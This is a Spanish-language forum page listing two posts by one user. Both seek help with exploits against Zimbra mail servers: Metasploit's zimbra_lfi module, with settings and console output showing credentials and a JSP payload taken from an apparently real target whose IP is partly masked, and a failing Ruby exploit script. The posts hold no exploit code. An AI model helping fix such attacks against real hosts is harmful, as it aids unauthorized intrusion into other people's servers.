Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Gyprus

#1
Exploit: exploit/unix/webapp/zimbra_lfi

RHOST: la ip al que voy a "atacar"
LHOST: ip local de la maquina virtual
puertos: Default RPORT : 7071 y Local: 4444

Y lo que me pasa es esto:

  • 200..x.xx.x.x:7071 - Getting login credentials...
  • 200.xx.xxx.xx:7071 - Got login credentials!
  • 200.xx.x.xx.x:7071 - Getting auth token...
  • No tienes permitido ver enlaces. Registrate o Entra a tu cuenta:7071 - Got auth token!
  • 200.xx.xx.x.x.x:7071 - Uploading payload
  • 200.xx.x.x.xx:7071 - Uploading jsp stager
  • 200.xx.xx.x.x:7071 - Executing payload on /downloads/dwZUmvrbqpKCV.jsp
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/dwZUmvrbqpKCV.jsp' on the target
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/nCFqzvYjOAFiS' on the target
    msf exploit(zimbra_lfi) >

    Y que ahí supuestamente tendria que salir la session pero eso no pasa. Creo que puede ser un error de puertos ,dmz o bien el host no es vuln. Ayuda? :P Desde ya muchas gracias
#2
Dudas y pedidos generales / Libreria ruby
Junio 13, 2014, 12:28:18 PM
Hola chicos! Bueno miren tengo un problema no sé por que cada vez que use linux o alguna version de esto siempre que hago un update y un upgrade se me llena de error todos los exploit e.e jaja.

Haciendo esta introprevia les paso a decir lo que pasa:

El exploit que estoy tratando de usar es el Zimbra - Privilegie Escalation via LFI (0day) la cuestion es que antes que yo actualice el exploit funcionaba pero ahora... cuando lo quiero ejecutar me tira error :

./run.rb: line 17: require: command not found
./run.rb: line 18: require: command not found
./run.rb: line 19: require: command not found
./run.rb: line 21: data: command not found
./run.rb: line 23: syntax error near unexpected token `('
./run.rb: line 23: `def exploit_begin()'

Alguien me puede decir que carajos paso? ._. Por que cuando update ahora no me funciona ? :S e.e

p/d:la baje de vuelta , le volvi a dar los permisos , revise las librerias y están. Lo que si es que... ahora tengo 2 ruby la 1.8 y la 1.9.

Desde ya muchas gracias ! saludos